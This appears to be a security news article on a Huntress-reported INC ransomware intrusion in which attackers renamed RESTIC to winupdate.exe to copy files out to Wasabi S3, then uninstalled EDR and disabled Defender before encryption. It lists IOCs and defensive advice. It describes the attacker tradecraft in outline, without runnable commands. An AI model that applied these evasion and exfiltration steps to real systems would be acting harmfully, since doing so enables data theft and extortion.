Huntress SOC analysts detected advanced RESTIC data exfiltration tied to INC ransomware campaigns, where intruders stage critical files with disguised backup utilities prior to payload deployment. The February 25, 2026, incident showed partial EDR coverage exposing share mapping to F:, PSEXEC privilege escalation, and a “Recovery Diagnostics” scheduled task triggering PowerShell at C:\Users\Public\Documents\new.ps1.
Base64-encoded commands configured RESTIC via AWS_ACCESS_KEY_ID, SECRET_ACCESS_KEY, s3.wasabisys.com repos, and exposed ‘password’ creds. Renamed restic.exe as winupdate.exe handled init and backups from new.txt lists. Incomplete agent rollout and absent SIEM hid initial access, echoing a February 9 case stopped mid-exfil.
Stealthy RESTIC Staging Techniques
Attackers exploit RESTIC’s versatility for covert RESTIC data exfiltration, setting env vars in PowerShell for Wasabi S3 targets and running init/backup sequences from hidden paths. File lists in new.txt suggest reconnaissance for high-value assets like configs and databases.
Renaming to winupdate.exe slips past signatures, while base64 in Event ID 600 logs mimics RMM activity. Weak passwords like ‘password’ risk repo compromise, as Cyber Centaurs noted in their January 22 analysis of overlapping infrastructure.
EDR Bypass and Ransomware Drop
After staging, edr.exe (SHA256: 1d15b57db62c079fc6274f8ea02ce7ec3d6b158834b142f5345db14f16134f0d) launched alongside VIPRE AgentUninstallPassword.exe, triggering SecurityCenter logs for agent disablement. Windows Defender real-time protection got snoozed next.
INC ransomware dropped as win.exe (SHA256: e034a4c00f168134900bfe235ff2f78daf8bfcfa8b594cd2dd563d43f5de1b13) using –sup –hide –mode medium, with RestartManager events (ID 10000) forcing file access for encryption and INC-README.txt drops.
Repeated TTPs and Key Defenses
Huntress connected dots to February 9 (HRSword vs. Acronis) and Cyber Centaurs’ findings via shared AWS keys and repos. IOCs confirm campaign overlap.
Deploy EDR fleetwide, enable SIEM for PowerShell anomalies, monitor schtasks and RESTIC processes, and block Wasabi S3 anomalies. Huntress triage by Amelia Casley and team prevented worse outcomes.
No Comment! Be the first one.